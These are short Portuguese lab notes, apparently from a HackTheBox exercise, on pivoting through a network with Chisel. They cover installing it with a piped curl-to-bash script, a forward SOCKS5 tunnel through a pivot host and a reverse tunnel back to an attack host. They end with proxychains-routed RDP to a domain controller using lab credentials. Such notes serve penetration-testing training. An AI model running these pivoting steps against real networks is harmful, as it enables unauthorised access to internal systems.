Chisel

Chisel é uma ferramenta de tunelamento baseada em TCP/UDP escrita em Go que usa HTTP para transportar dados protegidos usando SSH.

• Cloning Chisel

curl https://i.jpillora.com/chisel! | bash

• Binario

ln -s /usr/local/bin/chisel chisel

• Transferindo o Chisel Binary para o Pivot Host

scp chisel ubuntu@10.129.202.64:~/

• Executando o Chisel Server no Pivot Host

./chisel server -v -p 1234 --socks5

• Conectando ao servidor Chisel

./chisel client -v 10.129.202.64:1234 socks

• Editando e confirmando proxychains.conf

Akira20@htb[/htb]$ tail -f /etc/proxychains.conf 

#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4 	127.0.0.1 9050
socks5 127.0.0.1 1080

• Pivotando para o DC

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

---

Chisel Reverse Pivot

• Iniciando o Chisel Server em nosso Host de Ataque (kali)

sudo ./chisel server --reverse -v -p 1234 --socks5

• Conectando o Chisel Client ao nosso Host de Ataque (ubuntu)

./chisel client -v 10.10.14.17:1234 R:socks

• Editando e confirmando proxychains.conf

Akira20@htb[/htb]$ tail -f /etc/proxychains.conf 

[ProxyList]
# add proxy here ...
# socks4    127.0.0.1 9050
socks5 127.0.0.1 1080 

• Se usarmos proxychains com RDP, podemos nos conectar ao DC na rede interna através do túnel que criamos para o host Pivot.

proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

How To Pivot Through a Network with Chisel - John Hammond